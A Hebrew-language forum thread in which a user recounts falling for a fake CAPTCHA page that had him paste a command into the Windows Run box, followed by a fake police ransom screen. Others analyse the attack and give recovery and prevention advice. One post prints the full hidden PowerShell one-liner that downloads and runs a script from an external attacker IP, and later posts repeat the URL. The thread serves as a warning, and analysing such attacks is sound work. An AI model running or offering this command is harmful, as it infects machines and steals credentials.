שיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר
-
@cfopuser בנקים זה לא המקומות היחידים שחשובים לנו.
אפילו הפורום כאן. מה קורה אם מחר פורצים למשתמש ומעלים כאן קבל עם ועדה, מהמשתמש שלו, פרטים אישיים?
@מישהו12 זה כבר נהלים רגילים (לא למחזר סיסמאות, להישמר ברשת, לא להריץ תוכנות לא מוכרות וכו')
כמובן לבדוק פרטים ב https://haveibeenpwned.com/
ולפני שמריצים תוכנות ולינקים לבדוק בhttps://www.virustotal.com/ -
אתמול נתבקשתי על ידי אתר שקפץ לי בתור פרסומת, "לאמת שאני לא רובוט
".
רק שזה היה נראה בדיקה שונה, כך זה היה: להקיש לחצן התחל+R, ואז קונטרול+V, ואז אנטר.
את כל "האימות" הזה עשיתי במהירות, כך שלא חשבתי מה זה יכול לחולל.
מיד אחרי השלבים האלה נפתח חלון של PowerShell שהריצה פקודה קצרה ונסגרה ,
מיד נפתח חלון על כל המסך הודעה משטרת ישראל על עבירות חוק מהמחשב, ואמור להנעל המחשב לצמיתות, או תשלום כופר ע"ס: ₪1,100.
אף פעם לא חשבתי שתוכנות כופר יגיעו אלי, עד שהייתי צריך להשבית את כל האנטי וירוס כדי להתקין משהו, ובדיוק בזמן הזה זה קורא.
תחכימו תלמדו ותזהרו!נתתי לai את הפקודה שהדבקתי בחלונית ההתחל שפתחתי, וזה טוען שלקחו ממני כתובת ip, וכנראה סיסמאות
עריכה (לאחר 246 פוסטים שנכתבו בעניין הזה) כדי לקצר תהליכים למי שרוצה סיכום:
|-סיכום/הערכת מצב
פקודת PowerShell שהורצההפקודה שהועתקה כללה שימוש ב-PowerShell כדי להוריד קובץ טקסט (“clo.txt”) מ-IP חיצוני (84.21.189.170), ואז להריץ אותו עם פרמטרים מוסווים.
חלק מהטקסט שהטמיעו לקורבן כדי שידביק (“I am not a bot – Verification ID…”) נועד להטעות משתמשים כך שיחשבו שזה אימות "אני לא רובוט" אמיתי.
️ הסבר על וירוס כופר מסוג Clopמה הווירוס עושה:
יכול לבצע הצפנת קבצים חשובים במערכת.
עלול לגנוב נתונים רגישים ולדרוש תשלום כופר.
יכול למחוק עותקי גיבוי ולמנוע שחזור עצמאי.
משאיר הוראות כופר (Ransom Note) עם כתובת לתשלום (בדרך כלל במטבע קריפטו).
עצות והצעות למי שכבר הפעיל את הוירוסהצעות להגנה/תגובה מיידית:
- כיבוי מיידי של המחשב כדי לנסות לעצור המשך פעילות של הקוד.
- או ניתוק האינטרנט כדי למנוע הורדה נוספת או דיווח למפעילים.
- שינוי סיסמאות.
- מחיקת פרופיל דפדפן שבו הופיעה ההודעה.
- שחזור מידע דרך דיסקים טכנאים.
לגביי אנטי וירוס - אם עוזר במצבים כאלה? עדיין אן תשובה חד משמעית מהמשתמשים כאן. מכיון שייתכן והוירוס מסווה את עצמו גם מפני האנטי וירוס ועוקף אותו...
ולמי שרוצה לדעת איך להיזהר ולהגן על המחשב מפני וירוסים כאלה.
"להקדים רפואה למכה"
- אף פעם לא לבצע פעולות טכניות במחשב, מאתר שאומר לך מה לעשות (כדוגמת Win+R | Ctrl+V Enter). (@מתכנת-חובב).
- אנטי וירוס פעיל כל הזמן, מספיק לדברים כאלה לפחות את המובנה של ווינדוס.
- חסימת PowerShell (צעד מתקדם אבל חכם. הצעת AI)
צריך להגדיר שההרשאה לתוכנה זו - היא רק למנהל, ולא למשתמש רגיל. (לא יודע איך מגדירים). - כדאי להשתמש במנהל סיסמאות אמין במקום סיסמאות בדפדפן. (לדוגמה KeepassXC). (@מישהו12).
תודה לקב"ה - שאם נתקפתם בווירוס - זה היה על המחשב ולא בגופכם.
שימו 🤍 - השתדלתי לסכם מהפוסטים שכתבו כאן בשרשור (הקרדיט כולו שלכם, כתבו לי כדי להוסיף קרדיט אם צריך). זה לא מידע שלי. ייתכן ויש טעויות.@יונימדיה מקווה שעשית כיבוי של המחשב.
מכאן והלאה - לפרק את הדיסק הפנימי - רק אם יש לך ידע אחרת כדאי להעביר למישהו עם ידע שלא להרוס יותר!לחבר למחשב אחר [עדיף לנקי טוטאל שלא יהיה מה שיינזק] לסרוק עם אנטי וירוס עדכני טוב! - ESET לדוגמא
מסתבר שהוא בע"ה יוכל להסיר את מה שצריך..
משם והילך לבדוק האם החומר קיים תקין או שהוצפן...
אם זה קרה האירוע שונה לגמרי.
תצטרך כנראה לתת הרשאות למערכת הפעלה החדשה שממנה תעבוד מקווה שאתה יודע איך אם לא נשמח לעזור לך
שיהיה הרבה הצלחה בע"המישהו ניסה להוריד את הקוץ הפוגעני ולנתח אותו?
-
@מישהו12 זה כבר נהלים רגילים (לא למחזר סיסמאות, להישמר ברשת, לא להריץ תוכנות לא מוכרות וכו')
כמובן לבדוק פרטים ב https://haveibeenpwned.com/
ולפני שמריצים תוכנות ולינקים לבדוק בhttps://www.virustotal.com/ -
@יונימדיה מקווה שעשית כיבוי של המחשב.
מכאן והלאה - לפרק את הדיסק הפנימי - רק אם יש לך ידע אחרת כדאי להעביר למישהו עם ידע שלא להרוס יותר!לחבר למחשב אחר [עדיף לנקי טוטאל שלא יהיה מה שיינזק] לסרוק עם אנטי וירוס עדכני טוב! - ESET לדוגמא
מסתבר שהוא בע"ה יוכל להסיר את מה שצריך..
משם והילך לבדוק האם החומר קיים תקין או שהוצפן...
אם זה קרה האירוע שונה לגמרי.
תצטרך כנראה לתת הרשאות למערכת הפעלה החדשה שממנה תעבוד מקווה שאתה יודע איך אם לא נשמח לעזור לך
שיהיה הרבה הצלחה בע"המישהו ניסה להוריד את הקוץ הפוגעני ולנתח אותו?
-
@DANIEL-4 כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:
מישהו ניסה להוריד את הקוץ הפוגעני ולנתח אותו?
לדברים כאלה משתמשים בmirror שנסגר אחרי כמה דקות.
כנראה info stealer כולשהוא שמנצל את powershell לשימושיו. -
@cfopuser נכון אבל לא תמיד
בפרט אם זה אתר כה"ג בד"כ זה משתנה רק כל כמה שעות או אם נראה שאנטיוי חוסם.. -
ניתוח טכני של הפקודה
powershell -wi mi: זהו קיצור מוסווה של הפקודה WindowStyle Hidden. המטרה היא לגרום לחלון ה-PowerShell שייפתח להיעלם מיד מהעין של המשתמש, כדי שהוא לא יבין שרצה תוכנה ברקע.wget (או Invoke-WebRequest): הפקודה פונה לכתובת ה-IP המופיעה שם (84.21.189.170) ומנסה להוריד קובץ בשם clo.txt.
למרות שהסיומת היא .txt, זהו למעשה סקריפט של PowerShell שמכיל את הקוד הזדוני האמיתי
I am not a bot - Verification ID: #8620: זהו "רעש" שהתוקפים הוסיפו. ה-PowerShell מתעלם מהטקסט הזה כי הוא לא פקודה חוקית, אבל הוא נועד להטעות את המשתמש שמעתיק את הקוד, כדי שיחשוב שזה באמת חלק מתהליך אימות (CAPTCHA).
-
@DANIEL-4 במקרה הזה הבעלים של האתר קנה חבילה גדולה של seeds מ rapidseedbox.com
והשתמש בהם כדי להפיץ את הקובץ. -
@975 רק לנסות להבין אם יש לי סינון של נטפרי וכדומה האם אני בעצם מוגן מזה כי אני לא יכול בכלל להתחבר לכתובת של התוקף?
-
אתמול נתבקשתי על ידי אתר שקפץ לי בתור פרסומת, "לאמת שאני לא רובוט
".
רק שזה היה נראה בדיקה שונה, כך זה היה: להקיש לחצן התחל+R, ואז קונטרול+V, ואז אנטר.
את כל "האימות" הזה עשיתי במהירות, כך שלא חשבתי מה זה יכול לחולל.
מיד אחרי השלבים האלה נפתח חלון של PowerShell שהריצה פקודה קצרה ונסגרה ,
מיד נפתח חלון על כל המסך הודעה משטרת ישראל על עבירות חוק מהמחשב, ואמור להנעל המחשב לצמיתות, או תשלום כופר ע"ס: ₪1,100.
אף פעם לא חשבתי שתוכנות כופר יגיעו אלי, עד שהייתי צריך להשבית את כל האנטי וירוס כדי להתקין משהו, ובדיוק בזמן הזה זה קורא.
תחכימו תלמדו ותזהרו!נתתי לai את הפקודה שהדבקתי בחלונית ההתחל שפתחתי, וזה טוען שלקחו ממני כתובת ip, וכנראה סיסמאות
עריכה (לאחר 246 פוסטים שנכתבו בעניין הזה) כדי לקצר תהליכים למי שרוצה סיכום:
|-סיכום/הערכת מצב
פקודת PowerShell שהורצההפקודה שהועתקה כללה שימוש ב-PowerShell כדי להוריד קובץ טקסט (“clo.txt”) מ-IP חיצוני (84.21.189.170), ואז להריץ אותו עם פרמטרים מוסווים.
חלק מהטקסט שהטמיעו לקורבן כדי שידביק (“I am not a bot – Verification ID…”) נועד להטעות משתמשים כך שיחשבו שזה אימות "אני לא רובוט" אמיתי.
️ הסבר על וירוס כופר מסוג Clopמה הווירוס עושה:
יכול לבצע הצפנת קבצים חשובים במערכת.
עלול לגנוב נתונים רגישים ולדרוש תשלום כופר.
יכול למחוק עותקי גיבוי ולמנוע שחזור עצמאי.
משאיר הוראות כופר (Ransom Note) עם כתובת לתשלום (בדרך כלל במטבע קריפטו).
עצות והצעות למי שכבר הפעיל את הוירוסהצעות להגנה/תגובה מיידית:
- כיבוי מיידי של המחשב כדי לנסות לעצור המשך פעילות של הקוד.
- או ניתוק האינטרנט כדי למנוע הורדה נוספת או דיווח למפעילים.
- שינוי סיסמאות.
- מחיקת פרופיל דפדפן שבו הופיעה ההודעה.
- שחזור מידע דרך דיסקים טכנאים.
לגביי אנטי וירוס - אם עוזר במצבים כאלה? עדיין אן תשובה חד משמעית מהמשתמשים כאן. מכיון שייתכן והוירוס מסווה את עצמו גם מפני האנטי וירוס ועוקף אותו...
ולמי שרוצה לדעת איך להיזהר ולהגן על המחשב מפני וירוסים כאלה.
"להקדים רפואה למכה"
- אף פעם לא לבצע פעולות טכניות במחשב, מאתר שאומר לך מה לעשות (כדוגמת Win+R | Ctrl+V Enter). (@מתכנת-חובב).
- אנטי וירוס פעיל כל הזמן, מספיק לדברים כאלה לפחות את המובנה של ווינדוס.
- חסימת PowerShell (צעד מתקדם אבל חכם. הצעת AI)
צריך להגדיר שההרשאה לתוכנה זו - היא רק למנהל, ולא למשתמש רגיל. (לא יודע איך מגדירים). - כדאי להשתמש במנהל סיסמאות אמין במקום סיסמאות בדפדפן. (לדוגמה KeepassXC). (@מישהו12).
תודה לקב"ה - שאם נתקפתם בווירוס - זה היה על המחשב ולא בגופכם.
שימו 🤍 - השתדלתי לסכם מהפוסטים שכתבו כאן בשרשור (הקרדיט כולו שלכם, כתבו לי כדי להוסיף קרדיט אם צריך). זה לא מידע שלי. ייתכן ויש טעויות. -
@ארי בהרבה מקרים
אבל לא תמיד
לדוגמא אם האתר פתוח - נשלח מהאתר של התוקף שיש בו כל מיני דברים - בד"כ בכ"ג ESET לדוג' יעלה אזהרה אם מותקן לך אבל לא תמיד..
ואז קובץ TXT בכלל לא עובר בדיקה לפני ההורדה... -
@MGM-IVR אם אתם מעוניינים לראות מה היה צריך להדביק ב"התחל"- בספויילר.
רק אל תנסו להשתמש בו!!!
אני לא לוקח אחריות.
ולאקרים שבנינו - תפענחו מה עשה בדיוק הפקודה, מה גנבו... אם גנבוpowershell -wi mi (.'powershell' (. 'wget' -usebas '84.21.189.170:5506/clo.txt'));I am not a bot - Verification ID: #8620
@יונימדיה כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:
ולאקרים שבנינו - תפענחו מה עשה בדיוק הפקודה, מה גנבו... אם גנבו
זה פקודה שמושכת מהאתר סקריפט
זה מאוד ידוע השיטה הזאת
מהIP הזה משכו את הקובץ 84.21.189.170:5506/clo.txt אפשר לראות מה יש שם... -
@יונימדיה כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:
ולאקרים שבנינו - תפענחו מה עשה בדיוק הפקודה, מה גנבו... אם גנבו
זה פקודה שמושכת מהאתר סקריפט
זה מאוד ידוע השיטה הזאת
מהIP הזה משכו את הקובץ 84.21.189.170:5506/clo.txt אפשר לראות מה יש שם... -
בתכלס בלי לראות את הקובץ עצמו אין דרך לדעת מה הוא עשה... יתכן שחלק מההרצה זה למחוק אותו.
ניסיתי לשכנע את gpt להוריד אותו ולפענח אבל הוא לא מצליח לגשת אליו...
@עידו300 זה לא פעיל עכשיו הפורט הזה
-
@יונימדיה משטרת ישראל על עבירות חוק מהמחשב,
היה נראה הודעות בעברית טבעית? עם לוגו והכול?
מוזר.
בכול אופן כמו שכתבו פה לשנות סיסמאות ולאפס את המחשב.
@cfopuser כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:
בכול אופן כמו שכתבו פה לשנות סיסמאות ולאפס את המחשב.
קודם שיכבה ויוציא את הקבצים...
-
@יונימדיה משטרת ישראל על עבירות חוק מהמחשב,
היה נראה הודעות בעברית טבעית? עם לוגו והכול?
מוזר.
בכול אופן כמו שכתבו פה לשנות סיסמאות ולאפס את המחשב.
-
@עידו300 לא.יש דבר שנקרה התמדה שזה אומר שהפורץ מכניס הרבה דרכים להתחבר למחשב שלו.אי אפשר למחוק נקודתית
אבל כן צריך לחלץ את כל המערכת עם דיסק טכנאים פשוט